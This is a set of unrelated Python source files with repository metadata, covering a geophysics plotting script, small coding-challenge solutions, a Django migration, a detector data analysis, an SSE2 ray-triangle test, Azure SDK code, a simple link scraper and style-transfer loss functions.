1,896
py
from matplotlib import pyplot as plt
from numpy import genfromtxt, argmin, array, zeros, ones, where, linspace, r_
from matplotlib.ticker import MultipleLocator

g = genfromtxt('/Users/dmelgar/Amatrice2016/GPS/Cosismico_26Oct2016_GPS_GdL_V1.dat')
insar = genfromtxt(u'/Users/dmelgar/Amatrice2016/InSAR/M5.3-M5.8/Italy_T44/T44_Italy.lltnde')

#Parse GPS
lon_gps = g[:,1]
lat_gps = g[:,2]
north = g[:,6]/1000
east = g[:,4]/1000
up = g[:,8]/1000

#parse insar
lon_insar = insar[:,0]
lat_insar = insar[:,1]
los = insar[:,6]/1000
lookE = insar[:,3]
lookN = insar[:,4]
lookU = insar[:,5]

#Projection variables
projected_gps = 9999*ones(len(lon_gps))
los_insar = 9999*ones(len(lon_gps))
thresh = 0.005

for k in range(len(lon_gps)):
    #Get distance from GPS to LOS points
    d = ((lon_gps[k]-lon_insar)**2 + (lat_gps[k]-lat_insar)**2)**0.5
    i = argmin(d)
    if d[i] < thresh:
        #Get los vector
        unit_vector = array([lookE[i], lookN[i], lookU[i]])
        #project
        projected_gps[k] = unit_vector.dot(array([east[k], north[k], up[k]]))
        los_insar[k] = los[i]

plt.figure(figsize=(6,10))

plt.subplot(211)
plt.quiver(r_[11.65, lon_gps], r_[43.72, lat_gps], r_[1, east], r_[0, north], scale=0.11)
#i=where(up<0)[0]
#j=where(up>=0)[0]
#plt.quiver(lon_gps[j],lat_gps[j],zeros(len(up[j])),up[j],scale=0.01,color='b')
#plt.quiver(lon_gps[i],lat_gps[i],zeros(len(up[i])),up[i],scale=0.01,color='r')

ax = plt.subplot(212)
i = where(projected_gps < 9999)[0]
x = linspace(-0.02, 0.02)
y = x
plt.plot(x, y, lw=2, c='k')
plt.scatter(projected_gps[i], los_insar[i], marker='s', s=30, lw=0.2, c='#0080FF')
plt.xlim([-0.02, 0.02])
plt.ylim([-0.02, 0.02])
xmajorLocator = MultipleLocator(0.01)
ymajorLocator = MultipleLocator(0.01)
ax.xaxis.set_major_locator(xmajorLocator)
ax.yaxis.set_major_locator(ymajorLocator)
plt.ylabel('InSAR LOS (m)')
plt.xlabel('Projected GPS (m)')

plt.subplots_adjust(left=0.2, right=0.97, top=0.99, bottom=0.1)
a861a51696a1ce07f9eff6c8bb1d0344e618b511
3cadf60273e5e7ecede807d631d2c9b9e45499ad
/src/18_stuff/task02.py
d28f964b1cb2678dc24838eebe40832c175a7700
[]
no_license
shamanengine/HackerRank
78a4316713518601f4f0499626fbce8766e004df
8f6c4afa0b6d1e1e934af6ba173c00eae249f42e
refs/heads/master
2021-08-27T17:57:34.391358
2021-08-13T15:17:17
2021-08-13T15:17:17
143,048,178
0
0
null
null
null
null
UTF-8
Python
false
false
325
py
'''
Given 2 numbers, provide number of all perfect squares between them
'''
import math

a, b = map(int, input().strip().split())
i = 0
for x in range(int(math.ceil(a ** (1 / 2))), b):
    if x ** 2 <= b:
        i += 1
        # print(x)
    else:
        break
print(i)

'''
Input
1 50
25590 26590
9 49

Output
7
4
5
'''
a2c079a98705ce6a129fe2a91296597395f2abee
afb2bdf8044e4c9ff09b1b8379efbc17867d8cc0
/4parts/challenge/challenge2.py
e60f5117ceda493cf23d8d7097d1376bfa4b1068
[]
no_license
ChenFu0420/leranpython
b2e364ff8d6730a3eb768b76f0369faa3367dfa2
52d0aa614d7fab19e17bbb696330a0330d3862b6
refs/heads/master
2020-05-29T19:46:24.020046
2019-09-25T09:17:10
2019-09-25T09:17:10
189,339,151
0
0
null
null
null
null
UTF-8
Python
false
false
158
py
n = eval(input())
for i in range(n):
    for j in range(0, n - i):
        print(end=" ")
    for k in range(2 * i + 1):
        print("*", end="")
    print()
974d749d361019cdd9d6bb1b34a159f82ee40042
5d6201c7da4f19bc92f003b98629a10bd62e2426
/main/migrations/0002_auto_20151106_1447.py
2124b4360f205d273ee5ba1b8c5961096578fe9e
[]
no_license
azul-cloud/travelblogwave
35b24cf9550a544eeaeaa01d99b085930f5f410b
8c5dba290723484c3832606e9da0deba642395de
refs/heads/master
2021-01-21T05:01:11.100319
2016-05-30T12:25:25
2016-05-30T12:25:25
22,630,820
0
0
null
null
null
null
UTF-8
Python
false
false
532
py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
        ('main', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='user',
            name='username',
            field=models.CharField(help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=30, verbose_name='username'),
            preserve_default=False,
        ),
    ]
c4de4f95686f6d39c4a347e4462b601fbc2bd6d2
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p03828/s176803120.py
3c09dd5cfe45d562d5aee2961335ac10dec7d7b7
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
634
py
from collections import Counter

MOD = 10 ** 9 + 7

def factorize(n):
    """ Simple factorize
    :param n: number to factorize
    :return: list of factors
    time complexity : O(n√n)
    space complexity : O(n)
    """
    factors = []
    for i in range(2, n+1):
        while n % i == 0:
            n = n // i
            factors.append(i)
    return factors

def main():
    N = int(input())
    factors = []
    for i in range(1, N+1):
        factors += factorize(i)
    factor_counts = list(Counter(factors).values())
    ans = 1
    for v in factor_counts:
        ans = ans * (v+1) % MOD
    print(ans)

main()
9e5b1b073c0e724704be0a80caf06b160652600f
abc1a497c41ddd8669c8c41da18af65d08ca54e4
/try/recon/analize_recon_event.py
94841cb3f10478d5f14b3da82297e1331ee0b6fd
[]
no_license
gerakolt/direxeno_privet
fcef5e3b654720e277c48935acc168472dfd8ecc
75e88fb1ed44fce32fce02677f64106121259f6d
refs/heads/master
2022-12-20T22:01:30.825891
2020-10-04T06:01:07
2020-10-04T06:01:07
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,176
py
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import time
import os
import sys

pmts = np.array([0, 1, 4, 7, 8, 15])

BGpath = '/home/gerak/Desktop/DireXeno/190803/BG/EventRecon/'
path = '/home/gerak/Desktop/DireXeno/190803/Co57/EventRecon/'
blw_cut = 15
init_cut = 20
chi2_cut = 5000
left = 0
right = 400

Rec = np.recarray(100000, dtype=[
    ('area', 'i8', len(pmts)),
    ('blw', 'f8', len(pmts)),
    ('id', 'i8'),
    ('chi2', 'f8', len(pmts)),
    ('h', 'i8', (200, len(pmts))),
    ('init_event', 'i8'),
    ('init_wf', 'i8', len(pmts))
    ])
j = 0
id = 0
WFs = np.zeros((len(pmts), 1000))
recon_WFs = np.zeros((len(pmts), 1000))

# for filename in os.listdir(path):
#     if filename.endswith(".npz") and filename.startswith("recon1ns"):
#         print(filename)
#         data = np.load(path+filename)
#         rec = data['rec']
#         WFs += data['WFs']
#         recon_WFs += data['recon_WFs']
#         for r in rec:
#             Rec[j]['area'] = r['area']
#             Rec[j]['blw'] = r['blw']
#             Rec[j]['id'] = r['id']
#             Rec[j]['chi2'] = r['chi2']
#             Rec[j]['init_wf'] = r['init_wf']
#             Rec[j]['h'] = r['h']
#             Rec[j]['init_event'] = r['init_event']
#             if r['id'] > id:
#                 id = r['id']
#             j += 1
#         # sys.exit()
#         os.remove(path+filename)
# np.savez(path+'recon1ns'.format(id), rec=Rec[:j-1], WFs=WFs, recon_WFs=recon_WFs)

data = np.load(BGpath+'recon1ns.npz')
BG = data['rec']

data = np.load(path+'recon1ns.npz')
rec = data['rec']
WFs = data['WFs']
recon_WFs = data['recon_WFs']

fig, ax = plt.subplots(2, 3)
fig.subplots_adjust(wspace=0, hspace=0)
fig.suptitle('Co57', fontsize=25)
x = np.arange(1000)/5
for i in range(len(pmts)):
    np.ravel(ax)[i].plot(x, WFs[i], 'r1', label='WF: PMT{}'.format(pmts[i]))
    np.ravel(ax)[i].plot(x, recon_WFs[i], 'b-.', label='Recon')
    np.ravel(ax)[i].legend(fontsize=12)

fig, ax = plt.subplots(2, 3)
fig.suptitle('Co57', fontsize=25)
x = np.arange(1000)/5
for i in range(len(pmts)):
    np.ravel(ax)[i].hist(rec['init_wf'][:,i], bins=100, range=[0,400], label='PMT{} init_wf'.format(pmts[i]))
    np.ravel(ax)[i].legend(fontsize=15)

rec = rec[np.all(rec['init_wf'] > init_cut, axis=1)]
BG = BG[np.all(BG['init_wf'] > init_cut, axis=1)]

fig, ax = plt.subplots(2, 3)
fig.subplots_adjust(wspace=0, hspace=0)
fig.suptitle('Co57', fontsize=25)
x = np.arange(1000)/5
for i in range(len(pmts)):
    np.ravel(ax)[i].hist(rec['blw'][:,i], bins=100, range=[0,30], label='PMT{} BLW'.format(pmts[i]))
    np.ravel(ax)[i].legend(fontsize=15)

plt.figure()
plt.hist(np.sqrt(np.sum(rec['blw']**2, axis=1)), bins=100, label='BLW', range=[0,30])
plt.axvline(blw_cut, ymin=0, ymax=1, color='k')
plt.legend(fontsize=15)

rec = rec[np.sqrt(np.sum(rec['blw']**2, axis=1)) < blw_cut]
BG = BG[np.sqrt(np.sum(BG['blw']**2, axis=1)) < blw_cut]

fig, ax = plt.subplots(3, 2)
fig.subplots_adjust(wspace=0, hspace=0)
fig.suptitle('Co57', fontsize=25)
for i in range(len(pmts)):
    np.ravel(ax)[i].hist(rec['chi2'][:,i], bins=100, label='PMT{} chi2'.format(pmts[i]))
    np.ravel(ax)[i].set_yscale('log')
    np.ravel(ax)[i].legend(fontsize=15)

plt.figure()
plt.hist(np.sqrt(np.sum(rec['chi2']**2, axis=1)), bins=100, label='chi2')
plt.axvline(chi2_cut, ymin=0, ymax=1, color='k')
plt.legend(fontsize=15)
plt.yscale('log')

rec = rec[np.sqrt(np.sum(rec['chi2']**2, axis=1)) < chi2_cut]
rec = rec[np.sum(np.sum(rec['h'][:,:100,:], axis=2), axis=1) > 0]
BG = BG[np.sqrt(np.sum(BG['chi2']**2, axis=1)) < chi2_cut]
BG = BG[np.sum(np.sum(BG['h'][:,:100,:], axis=2), axis=1) > 0]

init = np.sum(np.sum(rec['h'][:,:10,:], axis=2), axis=1)
full = np.sum(np.sum(rec['h'][:,:100,:], axis=2), axis=1)
BGinit = np.sum(np.sum(BG['h'][:,:10,:], axis=2), axis=1)
BGfull = np.sum(np.sum(BG['h'][:,:100,:], axis=2), axis=1)

plt.figure()
plt.hist(init/full, bins=100, range=[0,1], label='Relative number of PEs in first 10 ns')

rec = rec[init/full < 0.5]
BG = BG[BGinit/BGfull < 0.5]

fig, ax = plt.subplots(3, 2)
fig.subplots_adjust(wspace=0, hspace=0)
fig.suptitle('Co57', fontsize=25)
for i in range(len(pmts)):
    np.ravel(ax)[i].plot(np.mean(rec['h'][:,:,i], axis=0), 'k-.', label='PMT{}'.format(pmts[i]))

plt.figure()
up = np.sum(rec['h'][:,:100,0], axis=1) + np.sum(rec['h'][:,:100,1], axis=1)
dn = np.sum(rec['h'][:,:100,-1], axis=1) + np.sum(rec['h'][:,:100,-2], axis=1) + np.sum(rec['h'][:,:100,-3], axis=1)
plt.plot(np.arange(450), np.arange(450)*3+18, 'k--')
plt.hist2d(up, dn, bins=[100, 100], range=[[0,350], [0,700]], norm=mcolors.PowerNorm(0.3))
plt.xlabel('Sum of PEs in the top floor PMTs', fontsize=25)
plt.ylabel('Sum of PEs in the bottom floor PMTs', fontsize=25)

rec0 = rec
rec = rec[dn < 3*up+18]
plt.legend(fontsize=15)

TB = 1564926608911 - 1564916365644
TA = 1564916315672 - 1564886605156
TBG = 1564874707904 - 1564826183355
TCs = 1564823506349 - 1564820274767

hist, bins = np.histogram(np.sum(np.sum(BG['h'][:,:100,:], axis=2), axis=1), bins=np.arange(250)*4)

plt.figure()
plt.hist(np.sum(np.sum(rec['h'][:,:100,:], axis=2), axis=1), bins=np.arange(250)*4, histtype='step', linewidth=5, label='All events')
plt.bar(0.5*(bins[1:]+bins[:-1]), TA/TBG*hist, label='BG', width=bins[1:]-bins[:-1], color='orange', alpha=0.5)
plt.axvline(left, 0, 1, color='k')
plt.axvline(right, 0, 1, color='k')
plt.legend(fontsize=15)

fig, ax = plt.subplots(2, 3)
# fig.suptitle('Co57 - Spec - slow', fontsize=25)
for i in range(len(pmts)):
    np.ravel(ax)[i].hist(np.sum(rec['h'][:,:,i], axis=1), bins=np.arange(200), histtype='step', label='After\n up-dn cut\n PMT{}'.format(i), linewidth=3)
    np.ravel(ax)[i].hist(np.sum(rec0['h'][:,:,i], axis=1), bins=np.arange(200), histtype='step', label='Before\n up-dn cut', linewidth=3)
    np.ravel(ax)[i].legend(fontsize=15)

# fig, ax = plt.subplots(3, 5)
# k = 0
# for i in range(len(pmts)-1):
#     hi = rec['h'][:,:,i]
#     for j in range(i+1, len(pmts)):
#         hj = rec['h'][:,:,j]
#         np.ravel(ax)[k].hist((np.sum(hi, axis=1)-np.mean(np.sum(hi, axis=1)))*(np.sum(hj, axis=1)-np.mean(np.sum(hj, axis=1)))/(np.mean(np.sum(hj, axis=1))*np.mean(np.sum(hi, axis=1))),
#             label='PMT{}-PMT{}'.format(pmts[i], pmts[j]), bins=100, range=[-1, 1])
#         np.ravel(ax)[k].legend()
#         k += 1

plt.show()
ed7791ad961fa9dd1d63297906e9bc6fdf71ef7c
be84495751737bbf0a8b7d8db2fb737cbd9c297c
/tests/test_intersections/triangle2.py
910e5c8217bcf254300859b37732a19f7136177f
[]
no_license
mario007/renmas
5e38ff66cffb27b3edc59e95b7cf88906ccc03c9
bfb4e1defc88eb514e58bdff7082d722fc885e64
refs/heads/master
2021-01-10T21:29:35.019792
2014-08-17T19:11:51
2014-08-17T19:11:51
1,688,798
1
0
null
null
null
null
UTF-8
Python
false
false
6,283
py
from tdasm import Tdasm, Runtime
from renmas.maths import Vector3
from renmas.shapes import Triangle, intersect_ray_shape_array
from renmas.core import Ray
import random
import renmas.utils as util
import timeit

asm_structs = util.structs("ray", "triangle", "hitpoint")

SSE2_ASM = """
#DATA
"""
SSE2_ASM += asm_structs + """
ray r1
triangle tri1
hitpoint hp
float one = 1.0
float zero = 0.0
float epsilon = 0.00001
float beta
float coff
float min_dist = 999999.0

float xm0[4]
float xm1[4]
float xm2[4]
float xm3[4]
float xm4[4]
float xm5[4]
float xm6[4]
float xm7[4]

uint32 xm0i[4]

uint32 result
uint32 n = 1000000

#CODE
mov eax, r1
mov ebx, tri1
mov ecx, min_dist
mov edx, hp
call ray_triangle
movaps oword [xm0], xmm0
movaps oword [xm1], xmm1
movaps oword [xm2], xmm2
movaps oword [xm3], xmm3
movaps oword [xm4], xmm4
movaps oword [xm5], xmm5
movaps oword [xm6], xmm6
movaps oword [xm7], xmm7
movaps oword [xm0i], xmm0
mov dword [result], eax
#END

global ray_triangle:
movaps xmm0, oword [ebx + triangle.p0]
movaps xmm2, oword [eax + ray.dir]
movaps xmm1, xmm0
subps xmm1, oword [ebx + triangle.p2]
movaps xmm3, xmm0
subps xmm3, oword [eax + ray.origin]
subps xmm0, oword [ebx + triangle.p1]

; f f h f
movaps xmm4, xmm1
movlhps xmm4, xmm3
shufps xmm4, xmm4, 01110101B
; k k k l
movaps xmm5, xmm2
movhlps xmm5, xmm3
shufps xmm5, xmm5, 00101010B
; f f h f * k k k l
movaps xmm7, xmm4
mulps xmm7, xmm5
; g g g h
movaps xmm6, xmm2
movlhps xmm6, xmm3
shufps xmm6, xmm6, 11010101B
; j j l j
movaps xmm4, xmm1
movhlps xmm4, xmm3
shufps xmm4, xmm4, 10001010B
; g g g h * j j l j
mulps xmm4, xmm6
; f f h f * k k k l - g g g h * j j l j
subps xmm7, xmm4
; a d a a
movaps xmm5, xmm0
movlhps xmm5, xmm3
shufps xmm5, xmm5, 00001000B
; a d a a * (f f h f * k k k l - g g g h * j j l j)
mulps xmm7, xmm5
; i l i i
movaps xmm5, xmm0
movhlps xmm5, xmm3
shufps xmm5, xmm5, 10100010B
; g g g h * i l i i
mulps xmm6, xmm5
; e h e e
movaps xmm4, xmm0
movlhps xmm4, xmm3
shufps xmm4, xmm4, 01011101B
; k k k l
movaps xmm5, xmm2
movhlps xmm5, xmm3
shufps xmm5, xmm5, 00101010B
; e h e e * k k k l
mulps xmm5, xmm4
; g g g h * i l i i - e h e e * k k k l
subps xmm6, xmm5
; b b d b
movaps xmm5, xmm1
movlhps xmm5, xmm3
shufps xmm5, xmm5, 00100000B
; b b d b * (g g g h * i l i i - e h e e * k k k l)
mulps xmm6, xmm5
addps xmm7, xmm6
; j j l j
movaps xmm5, xmm1
movhlps xmm5, xmm3
shufps xmm5, xmm5, 10001010B
; e e h e * j j l j
mulps xmm4, xmm5
; f f h f
movaps xmm6, xmm1
movlhps xmm6, xmm3
shufps xmm6, xmm6, 01110101B
; i l i i
movaps xmm5, xmm0
movhlps xmm5, xmm3
shufps xmm5, xmm5, 10100010B
; f f h f * i l i i
mulps xmm6, xmm5
; e h e e * j j l j - f f h f * i l i i
subps xmm4, xmm6
; c c c d
movaps xmm5, xmm2
movlhps xmm5, xmm3
shufps xmm5, xmm5, 10000000B
; c c c d * (e h e e * j j l j - f f h f * i l i i)
mulps xmm4, xmm5
addps xmm7, xmm4

movhlps xmm5, xmm7
movaps xmm4, xmm7
shufps xmm4, xmm4, 0x55
movaps xmm6, xmm7
shufps xmm6, xmm6, 0xFF

; xmm7 = d
; xmm6 = td
; xmm5 = gamma
; xmm4 = beta

pxor xmm3, xmm3
; beta < 0.0
movaps xmm0, xmm7
xorps xmm0, xmm4
cmpss xmm0, xmm3, 5
; gamma < 0.0
movaps xmm1, xmm7
xorps xmm1, xmm5
cmpss xmm1, xmm3, 5
; accumulation of conditions
andps xmm0, xmm1
; beta + gamma < 1.0
movaps xmm2, xmm4
addps xmm2, xmm5
cmpss xmm2, xmm6, 2
andps xmm0, xmm2

movd esi, xmm0
cmp esi, 0
jne _accept
xor eax, eax
ret

_accept:
divss xmm6, xmm7
comiss xmm6, dword [epsilon]
jc _reject
comiss xmm6, dword [ecx]  ;minimum distance
jnc _reject

;populate hitpoint structure
; t is in xmm6
movaps xmm2, oword [eax + ray.dir]
movaps xmm3, oword [ebx + triangle.normal]
movss xmm4, dword [ebx + triangle.mat_index]

movss dword [edx + hitpoint.t], xmm6
movaps oword [edx + hitpoint.normal], xmm3
movss dword [edx + hitpoint.mat_index], xmm4

macro broadcast xmm5 = xmm6[0]
mulps xmm5, xmm2
macro eq128 edx.hitpoint.hit = xmm5 + eax.ray.origin

mov eax, 1
ret

_reject:
xor eax, eax
ret
"""

def create_triangle():
    p0 = Vector3(0.1, 0.0, -2.0)
    p1 = Vector3(4.0, 0.5, 0.2)
    p2 = Vector3(2.2, 4.3, -1.0)
    tr = Triangle(p0, p1, p2, 3)
    return tr

def create_ray():
    origin = Vector3(0.0, 0.0, 0.0)
    dirx = 0.985906665972
    diry = 0.165777376892
    dirz = 0.0224923832256
    #direction = Vector3(8.8, 8.9, 8.7)
    direction = Vector3(dirx, diry, dirz)
    #direction.normalize()
    ray = Ray(origin, direction)
    return ray

def v4(v3):
    return (v3.x, v3.y, v3.z, 0.0)

if __name__ == "__main__":
    tr = create_triangle()
    ray = create_ray()
    hp = tr.isect(ray)
    if hp is not False:
        print(hp.t)

    asm = util.get_asm()
    mc = asm.assemble(SSE2_ASM)
    #mc.print_machine_code()
    runtime = Runtime()
    ds = runtime.load("test", mc)

    ds["tri1.p0"] = v4(tr.v0)
    ds["tri1.p1"] = v4(tr.v1)
    ds["tri1.p2"] = v4(tr.v2)
    ds["tri1.normal"] = v4(tr.normal)
    ds["tri1.mat_index"] = tr.material

    ds["r1.origin"] = v4(ray.origin)
    ds["r1.dir"] = v4(ray.dir)

    runtime.run("test")

    print("xmm0 = ", ds["xm0"])
    print("xmm1 = ", ds["xm1"])
    print("xmm2 = ", ds["xm2"])
    print("xmm3 = ", ds["xm3"])
    print("xmm4 = ", ds["xm4"])
    print("xmm5 = ", ds["xm5"])
    print("xmm6 = ", ds["xm6"])
    print("xmm7 = ", ds["xm7"])
    print("xmm7i = ", ds["xm0i"])
    print("Rezultat je = ", ds["result"])

    print(ds["hp.normal"])
    print(hp.normal)
    print(ds["hp.mat_index"])
    print(hp.material)
    print(ds["hp.hit"])
    print(hp.hit_point)
    print(ds["hp.t"])
    print(hp.t)
f5e6065e2191f1f68e81fc65acc158143819626d
a884039e1a8b0ab516b80c2186e0e3bad28d5147
/Livros/Livro-Introdução à Programação-Python/Capitulo 7/Exemplos 7/Listagem7_17.py
69bd31b1f28fb805b79086213f580f796b1c8375
[ "MIT" ]
permissive
ramonvaleriano/python-
6e744e8bcd58d07f05cd31d42a5092e58091e9f0
ada70918e945e8f2d3b59555e9ccc35cf0178dbd
refs/heads/main
2023-04-10T14:04:24.497256
2021-04-22T18:49:11
2021-04-22T18:49:11
340,360,400
0
0
null
null
null
null
UTF-8
Python
false
false
197
py
# Program: Listagem7_17.py
# Author: Ramon R. Valeriano
# Description:
# Developed: 18/05/2020 - 20:19
# Updated:

m = "Uma linha\nOutra Linhas\nE mais outra linha."
print(m)
print(m.splitlines())
611ca1b0710e080956b3f0259d5042c17ada5814
bad62c2b0dfad33197db55b44efeec0bab405634
/sdk/signalr/azure-mgmt-signalr/azure/mgmt/signalr/aio/operations/_usages_operations.py
aa1860efef37dbf2413c285639f2957501b5bfdb
[ "LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later" ]
permissive
test-repo-billy/azure-sdk-for-python
20c5a2486456e02456de17515704cb064ff19833
cece86a8548cb5f575e5419864d631673be0a244
refs/heads/master
2022-10-25T02:28:39.022559
2022-10-18T06:05:46
2022-10-18T06:05:46
182,325,031
0
0
MIT
2019-07-25T22:28:52
2019-04-19T20:59:15
Python
UTF-8
Python
false
false
5,150
py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings

from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat

from ... import models as _models
from ..._vendor import _convert_request
from ...operations._usages_operations import build_list_request

T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]


class UsagesOperations:
    """UsagesOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.signalr.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace
    def list(
        self,
        location: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.SignalRUsageList"]:
        """List resource usage quotas by location.

        :param location: the location like "eastus".
        :type location: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either SignalRUsageList or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.signalr.models.SignalRUsageList]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.SignalRUsageList"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            if not next_link:
                request = build_list_request(
                    location=location,
                    subscription_id=self._config.subscription_id,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    location=location,
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            deserialized = self._deserialize("SignalRUsageList", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.SignalRService/locations/{location}/usages'}  # type: ignore
702e397972e162ab5ddf2af196684a76f393bd61
71673d845952b50986d1c21dc5bbbcab2a2a2651
/introduction_to_lxml.py
0783fcf78d6a6982eff93f7b0558518976c20d60
[]
no_license
afcarl/introductionToWebScraping
77a44bfb7655e44231bed216d37b015e3cf52a5c
d1039aeee87365f2807dd198e53bd1bb6224a550
refs/heads/master
2020-03-26T04:23:54.052825
2015-06-18T14:23:40
2015-06-18T14:23:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
507
py
import requests
import lxml.html

base_url = "https://www.google.com"

def scrape(url, base_url, depth):
    if depth == 0:
        return True
    r = requests.get(url)
    html = lxml.html.fromstring(r.text)
    links = html.xpath("//a/@href")
    for ind, link in enumerate(links):
        if "http" in link:
            print link
        else:
            print base_url+link
            links[ind] = base_url+link
    for link in links:
        scrape(link, base_url, depth-1)

scrape(base_url, base_url, 5)
736a6dd319cdb36e01d57e42fdf371c5db550c22
6fcfb638fa725b6d21083ec54e3609fc1b287d9e
/python/ghwatson_faststyle/faststyle-master/losses.py
7a4cc6b60cea27257d8a4820a88ca8fb5d7f1574
[]
no_license
LiuFang816/SALSTM_py_data
6db258e51858aeff14af38898fef715b46980ac1
d494b3041069d377d6a7a9c296a14334f2fa5acc
refs/heads/master
2022-12-25T06:39:52.222097
2019-12-12T08:49:07
2019-12-12T08:49:07
227,546,525
10
7
null
2022-12-19T02:53:01
2019-12-12T07:29:39
Python
UTF-8
Python
false
false
3,526
py
""" This file contains the different loss functions. File author: Grant Watson Date: Feb 2017 """ import tensorflow as tf import numpy as np def content_loss(content_layers, target_content_layers, content_weights): """Defines the content loss function. :param content_layers List of tensors for layers derived from training graph. :param target_content_layers List of placeholders to be filled with content layer data. :param content_weights List of floats to be used as weights for content layers. """ assert(len(target_content_layers) == len(content_layers)) num_content_layers = len(target_content_layers) # Content loss content_losses = [] for i in xrange(num_content_layers): content_layer = content_layers[i] target_content_layer = target_content_layers[i] content_weight = content_weights[i] loss = tf.reduce_sum(tf.squared_difference(content_layer, target_content_layer)) loss = content_weight * loss _, h, w, c = content_layer.get_shape().as_list() num_elements = h * w * c loss = loss / tf.cast(num_elements, tf.float32) content_losses.append(loss) content_loss = tf.add_n(content_losses, name='content_loss') return content_loss def style_loss(grams, target_grams, style_weights): """Defines the style loss function. :param grams List of tensors for Gram matrices derived from training graph. :param target_grams List of numpy arrays for Gram matrices precomputed from style image. :param style_weights List of floats to be used as weights for style layers. """ assert(len(grams) == len(target_grams)) num_style_layers = len(target_grams) # Style loss style_losses = [] for i in xrange(num_style_layers): gram, target_gram = grams[i], target_grams[i] style_weight = style_weights[i] _, c1, c2 = gram.get_shape().as_list() size = c1*c2 loss = tf.reduce_sum(tf.square(gram - tf.constant(target_gram))) loss = style_weight * loss / size style_losses.append(loss) style_loss = tf.add_n(style_losses, name='style_loss') return style_loss def tv_loss(X): """Creates 2d TV loss using X as the input tensor. Acts on different colour channels individually, and uses convolution as a means of calculating the differences. :param X: 4D Tensor """ # These filters for the convolution will take the differences across the # spatial dimensions. Constructing these on paper has to be done carefully, # but can be easily understood when one realizes that the sub-3x3 arrays # should have no mixing terms as the RGB channels should not interact # within this convolution. Thus, the 2 3x3 subarrays are identity and # -1*identity. The filters should look like: # v_filter = [ [(3x3)], [(3x3)] ] # h_filter = [ [(3x3), (3x3)] ] ident = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]) v_array = np.array([[ident], [-1*ident]]) h_array = np.array([[ident, -1*ident]]) v_filter = tf.constant(v_array, tf.float32) h_filter = tf.constant(h_array, tf.float32) vdiff = tf.nn.conv2d(X, v_filter, strides=[1, 1, 1, 1], padding='VALID') hdiff = tf.nn.conv2d(X, h_filter, strides=[1, 1, 1, 1], padding='VALID') loss = tf.reduce_sum(tf.square(hdiff)) + tf.reduce_sum(tf.square(vdiff)) return loss
4de4a3deb1892d8a98427efd454a04849d8f4eda
f2fcf807b441aabca1ad220b66770bb6a018b4ae
/coderbyte/letter_capitalize.py
0db39e3300d9e2d0d879d72ba1ae2420481d6fcb
[]
no_license
gokou00/python_programming_challenges
22d1c53ccccf1f438754edad07b1d7ed77574c2c
0214d60074a3b57ff2c6c71a780ce5f9a480e78c
refs/heads/master
2020-05-17T15:41:07.759580
2019-04-27T16:36:56
2019-04-27T16:36:56
183,797,459
0
0
null
null
null
null
UTF-8
Python
false
false
150
py
def LetterCapitalize(str):
    # code goes here
    return str.title()

